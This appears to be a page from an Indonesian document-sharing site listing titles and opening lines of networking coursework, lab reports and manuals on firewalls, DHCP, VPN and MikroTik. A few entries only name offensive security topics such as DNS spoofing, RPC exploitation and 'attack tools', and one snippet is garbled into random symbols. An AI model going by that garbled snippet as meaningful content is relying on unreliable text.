BAB 15 KEAMANAN JARINGAN DENGAN FIREWALL BAB 15 KEAMANAN JARINGAN DENGAN FIREWALL Tujuan Instruksional Umum Siswa mampu menjelaskan mengenai firewall Tujuan Instruksional Khusus Siswa mampu menjelaskan secara umum apa itu firewall Siswa mampu

Lebih terperinci

MENGENAL LAN (LOCAL AREA NETWORK)

MENGENAL LAN (LOCAL AREA NETWORK) MENGENAL LAN (LOCAL AREA NETWORK) TCP/IP (Transmission Control Protocol/Internet Protocol) adalah sekelompok protokol yang mengatur komunikasi data komputer di internet. Komputer-komputer yang terhubung

Lebih terperinci

Resume. Pelatihan Membuat PC Router Menggunakan ClearOS. Diajukan Untuk Memenuhi Salah Satu Tugas Mata Kuliah. Lab. Hardware

Resume. Pelatihan Membuat PC Router Menggunakan ClearOS. Diajukan Untuk Memenuhi Salah Satu Tugas Mata Kuliah. Lab. Hardware Resume Pelatihan Membuat PC Router Menggunakan ClearOS Diajukan Untuk Memenuhi Salah Satu Tugas Mata Kuliah Lab. Hardware Nama : Andrian Ramadhan F. NIM : 10512318 Kelas : Sistem Informasi 8 PROGRAM STUDI

Lebih terperinci

PRAKTIKUM VII SHARING DATA,SHARING CD ROM/HARDISK, PRINT SERVER

PRAKTIKUM VII SHARING DATA,SHARING CD ROM/HARDISK, PRINT SERVER PRAKTIKUM VII SHARING DATA,SHARING CD ROM/HARDISK, PRINT SERVER A. DASAR TEORI Sharing adalah salah satu fasilitas dalam jaringan yang sangat membantu dalam pengoperasian jaringan. Kita dapat membagi file

Lebih terperinci

BAB 4 IMPLEMENTASI DAN EVALUASI

BAB 4 IMPLEMENTASI DAN EVALUASI BAB 4 IMPLEMENTASI DAN EVALUASI 4.1 PERALATAN YANG DIBUTUHKAN Pada tahap ini dilakukan implementasi sistem yang meliputi spesifikasi sistem untuk perangkat keras dan perangkat lunak pada sistem jaringan

Lebih terperinci

MODUL 2 INSTALASI JARINGAN DAN SUBNETING

MODUL 2 INSTALASI JARINGAN DAN SUBNETING MODUL 2 INSTALASI JARINGAN DAN SUBNETING 1. Tujuan a. Peserta Kerjalab memahami konsep jaringan pada workstation b. Peserta Kerjalab dapat menentukan kebutuhan akan jaringan dengan subneting c. Peserta

Lebih terperinci

MIKROTIK SEBAGAI ROUTER DAN BRIDGE

MIKROTIK SEBAGAI ROUTER DAN BRIDGE MODUL PELATIHAN NETWORK MATERI MIKROTIK SEBAGAI ROUTER DAN BRIDGE OLEH TUNGGUL ARDHI PROGRAM PHK K1 INHERENT UNIVERSITAS SEBELAS MARET 2007 Pendahuluan Routing memegang peranan penting dalam suatu network

Lebih terperinci

Manual Book SID RENTAL BUKU, by Manual Book SID RENTAL BUKU, by

Manual Book SID RENTAL BUKU, by  Manual Book SID RENTAL BUKU, by ! "# $%& & & ' (%& ") * +)& +)# &, ) - '. / + + / &,! ' )# * 0 ) 0 &, ' / 1 % # 2"" #!3! + ) /. & -+ # . ' +!. + +!.$$% /!. / /..!.. /& $ + 456 1&$% / 1$$%&,%! ( / -! ) + + $$%&$' +# 7 7 8 8 9 4*) ' :.1%

Lebih terperinci

ATTACK TOOLS. Oleh: M. RUDYANTO ARIEF 1

ATTACK TOOLS. Oleh: M. RUDYANTO ARIEF 1 ATTACK TOOLS Oleh: M. RUDYANTO ARIEF 1 Abstract Due to developments in networking technology, users can access network resources located anywhere in the world. However, this has made information prone

Lebih terperinci

DASAR JARINGAN KOMPUTER

DASAR JARINGAN KOMPUTER DASAR JARINGAN KOMPUTER IRAWAN AFRIANTO M.T PROGRAM STUDI TEKNIK INFORMATIKA UNIVERSITAS KOMPUTER INDONESIA Materi Pembahasan Konsep Jaringan Komputer LAN Konfigurasai Dasar Jaringan Komputer Konsep Jaringan

Lebih terperinci

PRAKTIKUM 3 Dynamic Host Configuration protocol pada Linux (Ubuntu) dan Windows 1. Praktikum 4. Dynamic Host Configuration Protocol

PRAKTIKUM 3 Dynamic Host Configuration protocol pada Linux (Ubuntu) dan Windows 1. Praktikum 4. Dynamic Host Configuration Protocol PRAKTIKUM 3 Dynamic Host Configuration protocol pada Linux (Ubuntu) dan Windows 1 Praktikum 4 Dynamic Host Configuration Protocol POKOK BAHASAN: Paket DHCP Server pada Linux (Ubuntu) Konfigurasi paket

Lebih terperinci

Gambar 4-1 Login ke dalam interface Cisco ASDM

Gambar 4-1 Login ke dalam interface Cisco ASDM BAB 4. IMPLEMENTASI Pada bab sebelumnya telah dijelaskan mengenai analisis masalah, analisis kebutuhan, analisis user, dan analis jaringan sebelum implementasi VPN. Juga telah dijelaskan mengenai pengujian

Lebih terperinci

BAB IV PEMBAHASAN Teknik Pengkabelan Twisted Pair

BAB IV PEMBAHASAN Teknik Pengkabelan Twisted Pair BAB IV PEMBAHASAN 4.1. Teknik Pengkabelan Twisted Pair Pengkabelan Twisted Pair menggunakan sebuah konektor Registered Jack (RJ). Adapun konektor RJ untuk kabel UTP CAT5/5 enchanced adalah RJ-45. Hal-hal

Lebih terperinci

LAPORAN PENDAHULUAN PRAKTIKUM KEAMANAN DATA Network Scanner dan Network Probing

LAPORAN PENDAHULUAN PRAKTIKUM KEAMANAN DATA Network Scanner dan Network Probing LAPORAN PENDAHULUAN PRAKTIKUM KEAMANAN DATA Network Scanner dan Network Probing Mata Kuliah : Keamanan Data Dosen Pengampu : Ferry Astika Saputra, S.T, M.Sc. Departemen : Departemen Teknik Informatika

Lebih terperinci

BAB IV DESKRIPSI KERJA PRAKTEK

BAB IV DESKRIPSI KERJA PRAKTEK 33 BAB IV DESKRIPSI KERJA PRAKTEK Bab ini membahas tentang proses setting untuk VPN pada Mikrotik dan menampilkan foto-foto hasil yang telah dikerjakan. 4.1 INSTALASI DAN PENGGUNAAN MIKROTIK 4.1.1 Prosedur

Lebih terperinci

Percobaan 4 Jaringan Hybrid: Kabel dan Nirkabel

Percobaan 4 Jaringan Hybrid: Kabel dan Nirkabel Modul 12 Percobaan 4 Jaringan Hybrid: Kabel dan Nirkabel 12.1 Tujuan - Mengetahui cara membangun wired network - Mengetahui cara membangun wireless network - Mengetahui cara interkoneksi antara jaringan

Lebih terperinci

Berbagi Koneksi Internet Di Virtualbox

Berbagi Koneksi Internet Di Virtualbox Berbagi Koneksi Internet Di Virtualbox Arsyan Andregate arsyanzone.178@gmail.com http://andregatemedia.blogspot.com Lisensi Dokumen: Seluruh dokumen di IlmuKomputer.Com dapat digunakan, dimodifikasi dan

Lebih terperinci

Remote Execution. Oleh: Idris Winarno

Remote Execution. Oleh: Idris Winarno Remote Execution Oleh: Idris Winarno Introduction Salah satu dasar mekanisme jaringan komputer adalah dapat melakukan perintah komputer secara jarak jauh. Pengguna dapat menjalankan aplikasi programnya

Lebih terperinci

BAB VI IDENTITAS KOMPUTER

BAB VI IDENTITAS KOMPUTER BAB VI IDENTITAS KOMPUTER Setelah selesai mempersiapkan alat dan terutama setelah selesai menyambungkan kabel ke konektornya kemudian di lanjutkan dengan melakukan setting di komputer yang dijaringkan.

Lebih terperinci

TUTORIAL SETTING MIKROTIK UNTUK SETTING IP, DHCP, GATEWAY, DNS.

TUTORIAL SETTING MIKROTIK UNTUK SETTING IP, DHCP, GATEWAY, DNS. TUTORIAL SETTING MIKROTIK UNTUK SETTING IP, DHCP, GATEWAY, DNS. Pertama-tama kita cek hardware dulu. Disini kita akan memberi PC Mikrotik dengan 2 network adapter. Network Adapter I sebagai NAT untuk ke

Lebih terperinci

Bertukar Data dengan Wireless LAN

Bertukar Data dengan Wireless LAN Bertukar Data dengan Wireless LAN Tedy Tirtawidjaja, S.T 25 Desember 2007 Tulisan ini saya buat setelah mencoba bertukar data dengan rekan saya, kami menggunakan notebook yang sama-sama dilengkapi dengan

Lebih terperinci

DAFTAR ISI. ABSTRAK...iv. KATA PENGANTAR...v. DAFTAR ISI... vii. DAFTAR GAMBAR... xi. DAFTAR TABEL... xv BAB I PENDAHULUAN... 1

DAFTAR ISI. ABSTRAK...iv. KATA PENGANTAR...v. DAFTAR ISI... vii. DAFTAR GAMBAR... xi. DAFTAR TABEL... xv BAB I PENDAHULUAN... 1 DAFTAR ISI Halaman ABSTRAK.........iv KATA PENGANTAR......v DAFTAR ISI... vii DAFTAR GAMBAR... xi DAFTAR TABEL... xv BAB I PENDAHULUAN... 1 1.1 Latar Belakang Masalah... 1 1.2 Perumusan Masalah... 2 1.3

Lebih terperinci

BAB III ANALISIS SISTEM. dan juga merupakan langkah persiapan menuju ke tahap perancangan

BAB III ANALISIS SISTEM. dan juga merupakan langkah persiapan menuju ke tahap perancangan BAB III ANALISIS SISTEM Analisa sistem merupakan penguraian dari suatu sistem yang utuh ke dalam bagian-bagian dari komponen dengan maksud untuk melakukan identifikasi dan evaluasi permasalahan, kesempatan,

Lebih terperinci

BAB III METODE PENELITIAN. Metodologi penelitian yang digunakana dalam penulisan skripsi ini adalah

BAB III METODE PENELITIAN. Metodologi penelitian yang digunakana dalam penulisan skripsi ini adalah 34 BAB III METODE PENELITIAN 3.1 Metode Penelitian Metodologi penelitian yang digunakana dalam penulisan skripsi ini adalah sebagai berikut: 1. Pengumpulan data a. Studi Pustaka Mencari dan mengumpulkan

Lebih terperinci

Konfigurasi DNS & Web Server

Konfigurasi DNS & Web Server LAPORAN PRAKTIKUM SISTEM OPERASI JARINGAN Konfigurasi DNS & Web Server Oleh: Eka Paramita Putri 1102652 1. Tujuan Praktikum - Mahasiswa mampu mengkonfigurasi Network Adapter pada VMWare. - Mahasiswa mampu

Lebih terperinci

tipe VPN yang dipakai adalah Remote Access VPN.

tipe VPN yang dipakai adalah Remote Access VPN. 162 Gambar 4.9 Tampilan Login Cisco 3640 j. Pilih menu untuk melakukan konfigurasi VPN pada Cisco SDM dengan cara mengklik menu Configure VPN Easy VPN Server Launch Easy VPN Server Wizard, dalam hal ini

Lebih terperinci

ANALISA JARINGAN DAN KEAMANAN KOMPUTER BERBASIS LAN PADA SEBUAH WARNET

ANALISA JARINGAN DAN KEAMANAN KOMPUTER BERBASIS LAN PADA SEBUAH WARNET ANALISA JARINGAN DAN KEAMANAN KOMPUTER BERBASIS LAN PADA SEBUAH WARNET Latar Belakang Jaringan komputer dan internet telah mengalami perkembangan yang sangat pesat. Teknologi ini mampu menyambungkan hampir

Lebih terperinci

Sabtu, 29 Januari 2011 FreeBSD 2 TKJ-A Pak Rudi. 2. Tujuan Agar siswa mampu membangun PC router dengan menggunakan OS FreeBSD.

Sabtu, 29 Januari 2011 FreeBSD 2 TKJ-A Pak Rudi. 2. Tujuan Agar siswa mampu membangun PC router dengan menggunakan OS FreeBSD. Ajie Kurnia Sidik Fajar Rohmawan Inge Yulensa Putri Konigurasi PC Router dengan OS Sabtu, 29 Januari 2011 Supriyanto FreeBSD 2 TKJ-A Pak Rudi Diagnosa LAN Pak Antoni 1. Pendahuluan PC Router adalah sebuah

Lebih terperinci

VPN (Virtual Private Network)

VPN (Virtual Private Network) VPN (Virtual Private Network) VPN merupakan metode untuk membangun jaringan yang menghubungkan antar node jaringan secara aman / terenkripsi dengan memanfaatkan jaringan publik (Internet / WAN). Beberapa

Lebih terperinci

DHCP SERVER DENGAN MENGGUNAKAN CLIENT WINDOWS XP 1. KONFIGURASI TCP/IP PADA WINDOWS 2000 SERVER

DHCP SERVER DENGAN MENGGUNAKAN CLIENT WINDOWS XP 1. KONFIGURASI TCP/IP PADA WINDOWS 2000 SERVER DHCP SERVER DENGAN MENGGUNAKAN CLIENT WINDOWS XP 1. KONFIGURASI TCP/IP PADA WINDOWS 2000 SERVER 1. Klik tombol Start, kemidian arahkan pada pilihan Control Panel dan Network Connection. 2. Klik pilihan

Lebih terperinci

PenTest::DNS Spoofing. Beginner Tutorial v.1

PenTest::DNS Spoofing. Beginner Tutorial v.1 PenTest::DNS Spoofing Beginner Tutorial v.1 DNS Spoffing Tools 1. Ettercap 2. DNS Spoof Plugin Ettercap 3. Kali Linux Sumber:csoonline DNS Spoofing DNS Spoofing adalah salah satu metode hacking Man In

Lebih terperinci

Manual Book SID-KOPERASI Manual Book SID-KOPERASI

Manual Book SID-KOPERASI  Manual Book SID-KOPERASI Manual Book SIDKOPERASI wwwsoftwareidcom Manual Book SIDKOPERASI wwwsoftwareidcom I INSTALLASI JARINGAN Proses untuk menginstallasi jaringan pada komputer anda Sebelum melakukan installasi anda harus mempersiapkan

Lebih terperinci

INSTALLATION GUIDE INSTALLATION GUIDE. PT.Technomatic Cipta Mandiri. IT division: Jl. Cikutra Baru Raya No.2 Bandung-40124

INSTALLATION GUIDE INSTALLATION GUIDE. PT.Technomatic Cipta Mandiri. IT division: Jl. Cikutra Baru Raya No.2 Bandung-40124 INSTALLATION GUIDE PT.Technomatic Cipta Mandiri IT division: Jl. Cikutra Baru Raya No.2 Bandung-40124 Telp./Fax.: 022 70051771; 7219761 INSTALLATION GUIDE INSTALLATION GUIDE MailTracking merupakan sebuah

Lebih terperinci

3. Salah satu tipe jaringan komputer yang umum dijumpai adalah... A. Star B. Bus C. WAN D. Wireless E. Client-server

3. Salah satu tipe jaringan komputer yang umum dijumpai adalah... A. Star B. Bus C. WAN D. Wireless E. Client-server 1. Ciri-ciri jaringan komputer adalah sebagai berikut ini, kecuali... A. Berbagi pakai perangkat keras (hardware) B. Berbagi pakai perangkat lunak (software) C. Berbagi user (brainware) D. Berbagi saluran

Lebih terperinci

PROSES, OBJEK DAN LAYANAN TERDISTRIBUSI

PROSES, OBJEK DAN LAYANAN TERDISTRIBUSI PROSES, OBJEK DAN LAYANAN TERDISTRIBUSI SISTEM TERDISTRIBUSI CLIENT SERVER PROSES TERDISTRIBUSI SISTEM TERDISTRIBUSI CLIENT SERVER 1 Proses terdistribusi dapat diaplikasikan pada berbagai ruang kerja,

Lebih terperinci

Modul 1: Topology Orientation and Building a Small Network

Modul 1: Topology Orientation and Building a Small Network Modul 1: Topology Orientation and Building a Small Network I. Topology Diagram Peer to Peer Network Switched Network II. Tujuan Praktikum Setelah menyelesaikan praktikum ini, mahasiswa diharapkan akan

Lebih terperinci

EKSPLOITASI RPC PADA SISTEM OPERASI WINDOWS

EKSPLOITASI RPC PADA SISTEM OPERASI WINDOWS EKSPLOITASI RPC PADA SISTEM OPERASI WINDOWS Sattriedi Wahyu B Fakultas Ilmu Komputer, Universitas AKI Semarang binabar@yahoo.co.id Abstrak : Windows XP merupakan salah satu sistem operasi yang banyak digunakan

Lebih terperinci

BAB 4 IMPLEMENTASI DAN PENGUJIAN

BAB 4 IMPLEMENTASI DAN PENGUJIAN BAB 4 IMPLEMENTASI DAN PENGUJIAN 4.1 Implementasi Tahapan implementasi sistem merupakan tahap penerjemahan perancangan berdasarkan hasil analisis serta penerapan kebutuhan pada keadaan yang sebenarnya.

Lebih terperinci

Modul 2 Konstruksi Network

Modul 2 Konstruksi Network Modul 2 Konstruksi Network 1.1 Tujuan a. Mahasiswa dapat menjelaskan arsitektur jaringan/network b. Mahasiswa dapat menghubungkan PC secara peer to peer 1.2 Materi a. Arsitektur Jaringan b. TCP/IP c. NIC

Lebih terperinci

SI IMPLEMENTASI VPN SERVER PADA WINDOWS 7

SI IMPLEMENTASI VPN SERVER PADA WINDOWS 7 SI-34-03 IMPLEMENTASI VPN SERVER PADA WINDOWS 7 0 Daftar Isi A. Apa itu VPN?... 2 B. Cara Kerja VPN... 2 C. Kelebihan dan Kekurangan VPN... 3 D. Manfaat menggunakan VPN... 3 E. Implementasi VPN... 4 a.

Lebih terperinci

BAB 4 IMPLEMENTASI DAN EVALUASI

BAB 4 IMPLEMENTASI DAN EVALUASI 47 BAB 4 IMPLEMENTASI DAN EVALUASI 4.1. Spesifikasi Sistem 4.1.1. Perangkat Keras Perangkat keras atau hardware terpenting yang dipakai untuk membuat perubahan pada topologi jaringan SMA St. Kristoforus

Lebih terperinci

ROUTER DAN BRIDGE BERBASIS MIKROTIK. Oleh : JB. Praharto ABSTRACT

ROUTER DAN BRIDGE BERBASIS MIKROTIK. Oleh : JB. Praharto ABSTRACT ROUTER DAN BRIDGE BERBASIS MIKROTIK Oleh : JB. Praharto ABSTRACT Sistem yang digunakan untuk menghubungkan jaringan-jaringan. Perangkat yang berfungsi dalam komunikasi WAN atau menghubungkan dua network

Lebih terperinci

PRAKTIKUM ADMINISTRASI JARINGAN KOMPUTER DHCP SERVER

PRAKTIKUM ADMINISTRASI JARINGAN KOMPUTER DHCP SERVER 1 PRAKTIKUM ADMINISTRASI JARINGAN KOMPUTER DHCP SERVER JURUSAN TEKNOLOGI INFORMASI POLITEKNIK ELEKTRONIKA NEGERI SURABAYA INSTITUT TEKNOLOGI SEPULUH NOPEMBER SURABAYA 2 DHCP Server I. Tujuan: Mahasiswa

Lebih terperinci

BAB IV ANALISIS KERJA PRAKTEK. ruangan yaitu ruangan marketing dan Gudang. Dimana untuk bagian Marketing

BAB IV ANALISIS KERJA PRAKTEK. ruangan yaitu ruangan marketing dan Gudang. Dimana untuk bagian Marketing BAB IV ANALISIS KERJA PRAKTEK 4.1 Konfigurasi Jaringan CV. SAGT Bandung CV. SAGT berencana memasang jaringan untuk menghubungkan 2 ruangan yaitu ruangan marketing dan Gudang. Dimana untuk bagian Marketing

Lebih terperinci

Manual Book SID-RETAIL Pro Manual Book SID-RETAIL Pro

Manual Book SID-RETAIL Pro  Manual Book SID-RETAIL Pro Manual Book SID-RETAIL Pro wwwsoftware-idcom Manual Book SID-RETAIL Pro wwwsoftware-idcom I INSTALLASI JARINGAN Proses untuk menginstallasi jaringan pada komputer anda Sebelum melakukan installasi anda

Lebih terperinci

Pengenalan Linux Konfigurasi TCP/IP

Pengenalan Linux Konfigurasi TCP/IP ADMINISTRASI SERVER Pengenalan Linux Konfigurasi TCP/IP Pengenalan Linux Berawal dari eksperimen Linus Trovalds dengan Komputer Minix miliknya, terciptalah Sistem Operasi Linux. Sejak saat itu, Dia terus

Lebih terperinci

Diajukan Oleh : Muhammad Triwibowo. Helman Muhammad, S.T,M.T.

Diajukan Oleh : Muhammad Triwibowo. Helman Muhammad, S.T,M.T. DETEKSI DAN PENCEGAHAN SERANGAN REMOTE CODE EXECUTION TERHADAP WING FTP WEB SERVER MENGGUNAKAN SNORT Makalah Program Studi Informatika Fakultas Komunikasi dan Informatika Diajukan Oleh : Muhammad Triwibowo

Lebih terperinci

A. INSTALLASI SOFTWARE

A. INSTALLASI SOFTWARE A. INSTALLASI SOFTWARE 1. Masukkan CD Program ke dalam CD ROM 3. Pilih Next 4. Pilih direktori tempat penyimpanan lalu tekan, Lanjut 2. Next untuk melanjutkan 5. Pilih Typical, Next B. LOGIN PROGRAM 1.

Lebih terperinci

MODUL 03 PRAKTIKUM TIM ASISTEN SISTEM OPERASI 2014

MODUL 03 PRAKTIKUM TIM ASISTEN SISTEM OPERASI 2014 MOD 03 DUL PRAKTIKUM TIM ASISTEN SISTEM OPERASI 2014 Manajemen Jaringan pada Sistem Operasi 1. Tujuan a. Mahasiswa mampu memahami konsep jaringan pada sistem operasi b. Mahasiswa mampu melakukan setting

Lebih terperinci

Analisis dan Implementasi Honeypot Menggunakan Dionaea Sebagai Penunjang Keamanan Jaringan

Analisis dan Implementasi Honeypot Menggunakan Dionaea Sebagai Penunjang Keamanan Jaringan Analisis dan Implementasi Honeypot Menggunakan Dionaea Sebagai Penunjang Keamanan Jaringan Triawan Adi Cahyanto 1), Hardian Oktavianto 2), Agil Wahyu Royan 3) 1,2,3) Jurusan Teknik Informatika, Fakultas

Lebih terperinci

I. INSTALLASI SOFTWARE

I. INSTALLASI SOFTWARE I. INSTALLASI SOFTWARE 1. Masukkan CD Program ke dalam CD ROM 4. Isikan username dan Organization, Next 2. Next untuk melanjutkan 5. Pilih Typical, Next 3. Pilih I accept the terms in the licence agrement,

Lebih terperinci

BAB 4 IMPLEMENTASI DAN EVALUASI. dapat mengimplementasikan rancangan ini secara langsung, maka digunakan simulator

BAB 4 IMPLEMENTASI DAN EVALUASI. dapat mengimplementasikan rancangan ini secara langsung, maka digunakan simulator BAB 4 IMPLEMENTASI DAN EVALUASI Dikarenakan biaya, waktu dan tempat yang tidak memungkinkan untuk dapat mengimplementasikan rancangan ini secara langsung, maka digunakan simulator untuk menjalankan rancangan

Lebih terperinci

MODUL SISTEM JARINGAN KOMPUTER MODUL 4 JARINGAN HYBRID

MODUL SISTEM JARINGAN KOMPUTER MODUL 4 JARINGAN HYBRID MODUL SISTEM JARINGAN KOMPUTER MODUL 4 JARINGAN HYBRID YAYASAN SANDHYKARA PUTRA TELKOM SMK TELKOM SANDHY PUTRA MALANG 2007 MODUL 4 PRAKTIKUM JARINGAN HYBRID Mata Pelajaran Kelas Semester Alokasi Waktu

Lebih terperinci

Gambar di atas merupakan connector RJ45 Male(laki) dilihat dari berbagai sisi. Dan gambar berikut merupakan pasangan nya yaitu RJ45

Gambar di atas merupakan connector RJ45 Male(laki) dilihat dari berbagai sisi. Dan gambar berikut merupakan pasangan nya yaitu RJ45 JARINGAN LAN Di sini saya mencoba untuk menjelaskan secara praktis bagaimana membuat jaringan komputer secara sederhana. Yang akan saya uraikan disini merupakan konsep jaringan dengan Topologi Star. Konsep

Lebih terperinci

BAB IV HASIL DAN PEMBAHASAN

BAB IV HASIL DAN PEMBAHASAN BAB IV HASIL DAN PEMBAHASAN 4.1. Tahap Pembangunan Sistem 4.1.1. Implementasi Windows Server 2012 R2 Pada tahap pertama, penulis menggunakan Windows Server 2012 R2 sebagai sistem operasi pada server utama,

Lebih terperinci

TELNET & ROUTING INTERNET

TELNET & ROUTING INTERNET TELNET & ROUTING INTERNET Sistem pelayanan informasi pada jaringan INTERNET, sebagian besar bekerja dengan konsep client-server, dimana program client akan meminta server untuk melakukan suatu tugas (misalnya

Lebih terperinci

PENGANTAR LAN (LOCAL AREA NETWORK)

PENGANTAR LAN (LOCAL AREA NETWORK) 6 PENGANTAR LAN (LOCAL AREA NETWORK) LABORATORIUM LANJUT SISTEM KOMPUTER FAKULTAS ILMU KOMPUTER UNIVERSITAS GUNADARMA PERTEMUAN VI PENGANTAR LAN (LOCAL AREA NETWORK) I. Tujuan Praktikum : Memahami dasar

Lebih terperinci

Laporan Pratikum Instalasi Jaringan Komputer Sharing Koneksi Internet

Laporan Pratikum Instalasi Jaringan Komputer Sharing Koneksi Internet Laporan Pratikum Instalasi Jaringan Komputer Sharing Koneksi Internet Nama : Ria Permata Sari NIM : 1107020 Prodi : Pendidikan Teknik Informatika dan Komputer Fakultas Teknik Universitas Negeri Padang

Lebih terperinci

Xcode Private Training. Network hacking & Security

Xcode Private Training. Network hacking & Security 2017 Xcode Private Training Network hacking & Security Network hacking & Security Pembelajaran teknik-teknik network hacking secara ethical, pengembangan exploit dan security. Waktu Training: 5 hari antara

Lebih terperinci

Firewall & WEB SERVICE

Firewall & WEB SERVICE Firewall & WEB SERVICE Definisi Firewall Umumnya ditempatkan pada batas network untuk membangun batas pinggir keamanan (security). Firewall digunakan untuk melindungi internal network dari eksternal yang

Lebih terperinci

Modul 1 Network Scanner & Probing

Modul 1 Network Scanner & Probing Modul 1 Network Scanner & Probing A. Tujuan Pembelajaran 1. Mahasiswa melakukan instalasi nmap. 2. Mahasiswa mengenal tentang penggunaan aplikasi nmap untuk melakukan scanning dan probing pada host. 3.

Lebih terperinci

IP Address. Dedi Hermanto

IP Address. Dedi Hermanto IP Address Dedi Hermanto TCP/IP Sekumpulan protokol yang terdapat di dalam jaringan komputer (network) yang digunakan untuk berkomunikasi atau berhubungan antar komputer. TCP/IP merupakan protokol standar

Lebih terperinci

Tugas MID Keamanan Jaringan Komputer

Tugas MID Keamanan Jaringan Komputer Tugas MID Keamanan Jaringan Komputer D I S U S U N OLEH : Ahmad Fitri Rashad 09121001023 SISTEM KOMPUTER FAKULTAS KOMPUTER UNIVERSITAS SRIWIJAYA INDRALAYA TAHUN AJARAN 2015 / 2016 Nmap: Nmap ( Network

Lebih terperinci

BANDWIDTH CONTROLLER MENGATUR TRAFIK DATA DIDALAM JARINGAN

BANDWIDTH CONTROLLER MENGATUR TRAFIK DATA DIDALAM JARINGAN BANDWIDTH CONTROLLER MENGATUR TRAFIK DATA DIDALAM JARINGAN Feature Mengatur download dan upload computer lain untuk data trafik. Prioritas bagi computer atau beberapa computer untuk mengaccess data pada

Lebih terperinci

II. ALAT DAN BAHAN 1. Kabel Null Modem 1 buah 2. 1 buah PC dengan OS WINDOWS 98/95 2 buah

II. ALAT DAN BAHAN 1. Kabel Null Modem 1 buah 2. 1 buah PC dengan OS WINDOWS 98/95 2 buah PERCOBAAN IV SHARING DATA ANTAR DUA KOMPUTER DENGAN DIRECT CABLE CONNECTION I. TUJUAN Membagi / Men-Share data antar dua komputer dengan menggunakan fasilitas Direct Cable Connection dengan perantara port

Lebih terperinci

A. INSTALLASI SOFTWARE

A. INSTALLASI SOFTWARE A. INSTALLASI SOFTWARE 1. Masukkan CD Program ke dalam CD ROM 4. Isikan username dan Organization, Next 2. Next untuk melanjutkan 5. Pilih Typical, Next 3. Pilih I accept the terms in the licence agrement,

Lebih terperinci

Didalam Ruang Lingkup Local Area Network Disusun oleh : Caesario Pujiatma

Didalam Ruang Lingkup Local Area Network Disusun oleh : Caesario Pujiatma Setting Server SuSe Didalam Ruang Lingkup Local Area Network Disusun oleh : Caesario Pujiatma E-mail : rollan.ak@gmail.com 1.1 Setup IP Address Sebagai awal untuk setting server kita harus mendefinisikan

Lebih terperinci

Making Provisions for Applications and Services

Making Provisions for Applications and Services Making Provisions for Applications and Services Ketika seseorang mengakses informasi pada suatu perangkat (device), baik itu PC, laptop, PDA, ponsel, atau device lain yang terhubung ke jaringan, data tidak

Lebih terperinci